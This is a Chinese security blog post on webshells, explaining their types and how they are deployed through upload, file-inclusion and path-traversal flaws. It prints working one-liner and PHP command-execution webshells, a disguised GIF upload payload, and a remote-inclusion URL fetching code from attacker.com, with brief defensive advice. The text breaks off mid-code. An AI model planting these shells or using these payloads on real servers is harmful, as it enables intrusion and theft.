<!DOCTYPE html>
<html lang=en>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="https:&#x2F;&#x2F;www.freebuf.com&#x2F;articles&#x2F;network&#x2F;307685.html一文讲解webshell https:&#x2F;&#x2F;cloud.tencent.com&#x2F;developer&#x2F;article&#x2F;1635250 基础Webshell就是以asp、php、jsp或cgi等网页文件形式存在的一种代码执行环境，也可以将其称做为一种网页后门。 WebShell的特点  持久化远程访问">
<meta property="og:type" content="article">
<meta property="og:title" content="【Web安全】深入理解Webshell：部署、检测与防御">
<meta property="og:url" content="https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/index.html">
<meta property="og:site_name" content="g0dam">
<meta property="og:description" content="https:&#x2F;&#x2F;www.freebuf.com&#x2F;articles&#x2F;network&#x2F;307685.html一文讲解webshell https:&#x2F;&#x2F;cloud.tencent.com&#x2F;developer&#x2F;article&#x2F;1635250 基础Webshell就是以asp、php、jsp或cgi等网页文件形式存在的一种代码执行环境，也可以将其称做为一种网页后门。 WebShell的特点  持久化远程访问">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/image.png">
<meta property="article:published_time" content="2024-10-18T06:58:42.000Z">
<meta property="article:modified_time" content="2024-10-19T06:35:54.837Z">
<meta property="article:author" content="g0dam">
<meta property="article:tag" content="Webshell">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/image.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/favicon.ico">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/favicon-192x192.png" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon.png">
        
      
    
    <!-- title -->
    <title>【Web安全】深入理解Webshell：部署、检测与防御</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
      <link rel="alternate" href="/true" title="g0dam" type="application/atom+xml" />
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="Menu"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="Top" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/idea/">Idea</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="Previous post" href="/2024/10/18/WebSecurity/webshell/webshellevasion/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="Next post" href="/2024/10/18/algorithm/kmp/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="Back to top" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="Share post" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">Previous post</span>
      <span id="i-next" class="info" style="display:none;">Next post</span>
      <span id="i-top" class="info" style="display:none;">Back to top</span>
      <span id="i-share" class="info" style="display:none;">Share post</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&text=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&is_video=false&description=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【Web安全】深入理解Webshell：部署、检测与防御&body=Check out this article: https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&name=【Web安全】深入理解Webshell：部署、检测与防御&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&t=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80"><span class="toc-number">1.</span> <span class="toc-text">基础</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%83%A8%E7%BD%B2%E6%8A%80%E6%9C%AF"><span class="toc-number">2.</span> <span class="toc-text">部署技术</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Webshell%E7%9A%84%E7%B1%BB%E5%9E%8B"><span class="toc-number">3.</span> <span class="toc-text">Webshell的类型</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%A4%A7%E9%A9%AC%EF%BC%88Full-Featured-Shells%EF%BC%89"><span class="toc-number">3.1.</span> <span class="toc-text">1. 大马（Full-Featured Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%B0%8F%E9%A9%AC%EF%BC%88Simple-Shells%EF%BC%89"><span class="toc-number">3.2.</span> <span class="toc-text">2. 小马（Simple Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%EF%BC%88One-liner-Shells%EF%BC%89"><span class="toc-number">3.3.</span> <span class="toc-text">3. 一句话木马（One-liner Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%89%93%E5%8C%85%E9%A9%AC%EF%BC%88Packing-Shells%EF%BC%89"><span class="toc-number">3.4.</span> <span class="toc-text">4. 打包马（Packing Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E6%8B%96%E5%BA%93%E9%A9%AC%EF%BC%88Database-Dump-Shells%EF%BC%89"><span class="toc-number">3.5.</span> <span class="toc-text">5. 拖库马（Database Dump Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-%E5%86%85%E5%AD%98%E9%A9%AC%EF%BC%88In-Memory-Shells%EF%BC%89"><span class="toc-number">3.6.</span> <span class="toc-text">6. 内存马（In-Memory Shells）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WebShell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7"><span class="toc-number">4.</span> <span class="toc-text">WebShell管理工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Webshell%E6%A3%80%E6%B5%8B%E6%96%B9%E6%B3%95"><span class="toc-number">5.</span> <span class="toc-text">Webshell检测方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%83%E9%81%BF%E6%8A%80%E6%9C%AF"><span class="toc-number">6.</span> <span class="toc-text">逃避技术</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        【Web安全】深入理解Webshell：部署、检测与防御
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">g0dam</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-10-18T06:58:42.000Z" class="dt-published" itemprop="datePublished">2024-10-18</time>
        
      
    </div>


      
    <div class="article-category">
        <i class="fa-solid fa-archive"></i>
        <a class="category-link" href="/categories/Web-Security/">Web Security</a>
    </div>


      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/Webshell/" rel="tag">Webshell</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p><a target="_blank" rel="noopener" href="https://www.freebuf.com/articles/network/307685.html">https://www.freebuf.com/articles/network/307685.html</a><br>一文讲解webshell <a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1635250">https://cloud.tencent.com/developer/article/1635250</a></p>
<h2 id="基础"><a href="#基础" class="headerlink" title="基础"></a>基础</h2><p>Webshell就是以asp、php、jsp或cgi等网页文件形式存在的一种代码执行环境，也可以将其称做为一种网页后门。</p>
<p>WebShell的特点</p>
<ol>
<li>持久化远程访问: Webshell脚本通常会包含后门，黑客上传Webshell之后，就可以充分利用Webshell的后门实现远程访问并控制服务器，从而达到长期控制网站服务器的目的。此外，在上传完Webshell之后，黑客会选择自己修复漏洞，以确保没有其他人会利用该漏洞。通过这种方式，黑客就可以一种低调的姿态，避免与管理员进行任何交互，同时仍然获得相同的结果。</li>
<li>提权: 在服务器没有配置错误的情况下，Webshell将在web服务器的用户权限下运行，而用户权限是有限的。通过Webshell，黑客可以利用系统上的本地漏洞来实现权限提升，从而获得Root权限，这样黑客基本上可以在系统上做任何事情，包括安装软件、更改权限、添加和删除用户、窃取密码、阅读电子邮件等等。</li>
<li>隐蔽性极强: Webshell可以嵌套在正常网页中运行，且不容易被查杀。它还可以穿越服务器防火墙，由于与被控制的服务器或远程主机交互的数据都是通过80端口传递，因此不会被防火墙拦截，在没有记录流量的情况下，Webshell使用post包发送，也不会被记录在系统日志中，只会在Web日志中记录一些数据提交的记录。</li>
</ol>
<p><strong>WebShell分类</strong><br>Webshell根据脚本可以分为PHP脚本木马，ASP脚本木马，JSP脚本木马，也有基于.NET的脚本木马。根据时代和技术的变迁，也有用python和lua编写的脚本木马，常用有如下几种：</p>
<ul>
<li>大马：体积大，功能全；会调用系统关键函数；以代码加密进行隐藏</li>
<li>小马：体积小，功能少；一般只有一个上传功能，用于上传大马</li>
<li>一句话木马：代码短；使用场景大，可单独生成文件，可插入文件；安全性高，隐藏性强，可变形免杀；框架不变，数据执行，数据传递；使用客户端管理webshell，省去使用命令行以及各种参数配置，可以使用中国蚁剑图形化操作webshell</li>
<li>打包马：主要用于打包网站源码</li>
<li>拖库马：主要用于导出网站数据库</li>
<li>内存马：无文件落地；极难检测和发现；难以清除</li>
</ul>
<p><strong>WebShell原理</strong><br>不同脚本类型的一句话木马：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&lt;%<span class="keyword">eval</span> <span class="title function_ invoke__">request</span>(<span class="string">&quot;cmd&quot;</span>)%&gt;</span><br><span class="line">&lt;%@ Page Language=<span class="string">&quot;Jscript&quot;</span>%&gt;&lt;%<span class="keyword">eval</span>(Request.Item[<span class="string">&quot;cmd&quot;</span>],<span class="string">&quot;unsafe&quot;</span>);%&gt;</span><br><span class="line"><span class="meta">&lt;?php</span> @<span class="keyword">eval</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;cmd&#x27;</span>]); <span class="meta">?&gt;</span></span><br><span class="line">&lt;%Runtime.<span class="title function_ invoke__">getRuntime</span>().<span class="title function_ invoke__">exec</span>(request.<span class="title function_ invoke__">getParameter</span>(<span class="string">&quot;cmd&quot;</span>));%&gt;</span><br></pre></td></tr></table></figure>
<p><img src="/2024/10/18/WebSecurity/webshell/webshell/image.png"></p>
<p>PHP一句话木马核心步骤如下：</p>
<ol>
<li>数据传递: <code>$_GET、$_POST、$_COOKIES、$_REQUEST、$_FILE、$_SERVER</code><br>  从远程远程URL中获取数据: file_get_contents、curl、svn_checkout…<br>  （将需要执行的指令数据放在远程URL中，通过URL_INCLUDE来读取）<br>  从本地磁盘文件中获取数据: file、file_get_contents…<br>  （将需要执行的指令数据放在本地磁盘文件中，利用IO函数来读取）<br>  从数据库中读取（将需要执行的指令放在数据库中，利用数据库函数来读取）<br>  从图片头部中获取: exif_read_data…（将需要执行的指令数据放在图片头部中，利用图片操作函数来读取）</li>
<li>代码执行<br>  代码执行函数：eval、assert、system…执行（这是最普通、标准的代码执行）<br>  LFI（本地文件包含）：include、require…（利用浏览器的伪协议将文件包含转化为代码执行）<br>  动态函数执行：（$()…PHP的动态函数特性）<br>  Curly Syntax：（${${…}}…它将执行花括号间的代码，并将结果替换回去。这种思路可以把变量赋值的漏洞转化为代码执行的机会）</li>
</ol>
<p><strong>PHP中常被利用的函数</strong><br>    1. 简单的PHP Webshell 使用 <code>system()</code> 函数<br>    <figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>])) &#123;</span><br><span class="line">        <span class="title function_ invoke__">system</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure><br>    2. 使用 <code>exec()</code> 函数的Webshell</p>
<pre><code><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>])) &#123;</span><br><span class="line">        <span class="title function_ invoke__">exec</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>], <span class="variable">$output</span>);</span><br><span class="line">        <span class="keyword">foreach</span> (<span class="variable">$output</span> <span class="keyword">as</span> <span class="variable">$line</span>) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$line</span>, ENT_QUOTES) . <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
3. 使用 `shell_exec()` 函数的Webshell

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>])) &#123;</span><br><span class="line">        <span class="variable">$output</span> = <span class="title function_ invoke__">shell_exec</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;&lt;pre&gt;&quot;</span> . <span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$output</span>, ENT_QUOTES) . <span class="string">&quot;&lt;/pre&gt;&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

4. 使用 `passthru()` 函数的Webshell

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>])) &#123;</span><br><span class="line">        <span class="title function_ invoke__">passthru</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

5. 使用 `proc_open()` 的高级Webshell
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>])) &#123;</span><br><span class="line">        <span class="variable">$descriptorspec</span> = <span class="keyword">array</span>(</span><br><span class="line">        <span class="number">0</span> =&gt; <span class="keyword">array</span>(<span class="string">&quot;pipe&quot;</span>, <span class="string">&quot;r&quot;</span>),  <span class="comment">// stdin 是个管道，从中读取数据</span></span><br><span class="line">        <span class="number">1</span> =&gt; <span class="keyword">array</span>(<span class="string">&quot;pipe&quot;</span>, <span class="string">&quot;w&quot;</span>),  <span class="comment">// stdout 是个管道，向其中写入数据</span></span><br><span class="line">        <span class="number">2</span> =&gt; <span class="keyword">array</span>(<span class="string">&quot;pipe&quot;</span>, <span class="string">&quot;w&quot;</span>)   <span class="comment">// stderr 是一个文件，写入到 tmp/error-output.txt</span></span><br><span class="line">        );</span><br><span class="line"></span><br><span class="line">        <span class="variable">$process</span> = <span class="title function_ invoke__">proc_open</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>], <span class="variable">$descriptorspec</span>, <span class="variable">$pipes</span>);</span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span> (<span class="title function_ invoke__">is_resource</span>(<span class="variable">$process</span>)) &#123;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;pre&gt;&quot;</span>;</span><br><span class="line">            <span class="keyword">while</span> (<span class="variable">$line</span> = <span class="title function_ invoke__">fgets</span>(<span class="variable">$pipes</span>[<span class="number">1</span>])) &#123;</span><br><span class="line">                <span class="keyword">echo</span> <span class="title function_ invoke__">htmlspecialchars</span>(<span class="variable">$line</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">echo</span> <span class="string">&quot;&lt;/pre&gt;&quot;</span>;</span><br><span class="line"></span><br><span class="line">            <span class="title function_ invoke__">fclose</span>(<span class="variable">$pipes</span>[<span class="number">0</span>]);</span><br><span class="line">            <span class="title function_ invoke__">fclose</span>(<span class="variable">$pipes</span>[<span class="number">1</span>]);</span><br><span class="line">            <span class="title function_ invoke__">fclose</span>(<span class="variable">$pipes</span>[<span class="number">2</span>]);</span><br><span class="line">            <span class="title function_ invoke__">proc_close</span>(<span class="variable">$process</span>);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
</code></pre>
<h2 id="部署技术"><a href="#部署技术" class="headerlink" title="部署技术"></a>部署技术</h2><ol>
<li>文件上传漏洞<br>文件上传漏洞通常发生在应用程序未能正确验证上传文件的真实类型和内容时。<br><strong>攻击示例：</strong><br>考虑一个基本的图片上传功能，以下是一个简单的PHP代码示例，该代码存在文件上传漏洞：</li>
</ol>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;uploaded_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>])) &#123;</span><br><span class="line">    <span class="variable">$target_path</span> = <span class="string">&quot;uploads/&quot;</span>;</span><br><span class="line">    <span class="variable">$target_path</span> = <span class="variable">$target_path</span> . <span class="title function_ invoke__">basename</span>( <span class="variable">$_FILES</span>[<span class="string">&#x27;uploaded_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]); </span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;uploaded_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>], <span class="variable">$target_path</span>)) &#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;File uploaded successfully!&quot;</span>;</span><br><span class="line">    &#125; <span class="keyword">else</span>&#123;</span><br><span class="line">        <span class="keyword">echo</span> <span class="string">&quot;There was an error uploading the file, please try again!&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>此代码片段接受上传的文件并将其存储在服务器的“uploads”目录中。没有对文件类型或内容进行任何验证。<br><strong>攻击Payload：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">GIF89a;</span><br><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">echo</span> <span class="string">&#x27;This is a webshell!&#x27;</span>;</span><br><span class="line"><span class="title function_ invoke__">system</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;cmd&#x27;</span>]);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>攻击者可以将此PHP代码保存为<code>shell.php.gif</code>，并上传到服务器。由于文件以“GIF”开头，一些简单的文件类型检查（如检查文件扩展名）可能会被绕过。一旦上传，攻击者可以通过访问URL <code>http://targetsite.com/uploads/shell.php.gif?cmd=whoami</code> 执行命令。</p>
<p><strong>深入分析：</strong><br>这种类型的漏洞表明开发者可能忽略了多层次的安全检查，例如内容白名单验证、MIME类型检查和文件内容扫描等。预防此类攻击的策略包括实施严格的文件验证逻辑、限制上传文件的类型、并使用随机生成的文件名存储上传的文件。</p>
<ol start="2">
<li><p>服务器端包含（SSI）漏洞<br>SSI漏洞允许攻击者通过在页面中插入恶意内容来执行服务器端脚本。<br><strong>漏洞代码示例：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="variable">$file</span> = <span class="variable">$_GET</span>[<span class="string">&#x27;file&#x27;</span>];</span><br><span class="line"><span class="keyword">include</span>(<span class="variable">$file</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>此代码片段直接从URL参数中取得文件名并包含该文件，未对输入进行过滤或验证。<br><strong>攻击Payload：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://targetsite.com/page.php?file=../../../../etc/passwd</span><br></pre></td></tr></table></figure>
<p>通过使用目录遍历攻击（即路径穿越攻击），攻击者尝试访问系统敏感文件，如<code>/etc/passwd</code>。<br><strong>深入分析：</strong><br>服务器端脚本应限制可包含的文件范围，并对输入路径进行严格的验证。避免直接将不受信任的输入用于文件操作是预防SSI漏洞的关键。</p>
</li>
<li><p>远程文件包含（RFI）<br>RFI允许攻击者远程执行恶意脚本，通常是通过在包含函数中指定外部URL。</p>
</li>
</ol>
<p><strong>漏洞代码示例：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>]))&#123;</span><br><span class="line">    <span class="keyword">include</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;url&#x27;</span>]);</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
<p>此PHP脚本通过<code>url</code>参数直接包含远程文件，没有验证URL的合法性。<br><strong>攻击Payload：</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://targetsite.com/page.php?url=http://attacker.com/malicious.php</span><br></pre></td></tr></table></figure>
<p>攻击者通过将<code>url</code>参数设置为控制的恶意PHP文件的URL，迫使服务器执行远程PHP代码。<br><strong>深入分析：</strong><br>开发者应禁用PHP配置中的<code>allow_url_include</code>选项，且应用程序不应直接将外部数据用于关键函数。确保所有包含的文件都来自受信任的源头，是预防RFI的关键策略。</p>
<h2 id="Webshell的类型"><a href="#Webshell的类型" class="headerlink" title="Webshell的类型"></a>Webshell的类型</h2><h3 id="1-大马（Full-Featured-Shells）"><a href="#1-大马（Full-Featured-Shells）" class="headerlink" title="1. 大马（Full-Featured Shells）"></a>1. 大马（Full-Featured Shells）</h3><p><strong>PHP 示例：</strong></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Shell</span> </span>&#123;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">file_manager</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="comment">// 文件管理逻辑</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">database_manager</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">        <span class="comment">// 数据库操作逻辑</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">execute_command</span>(<span class="params"><span class="variable">$cmd</span></span>) </span>&#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="title function_ 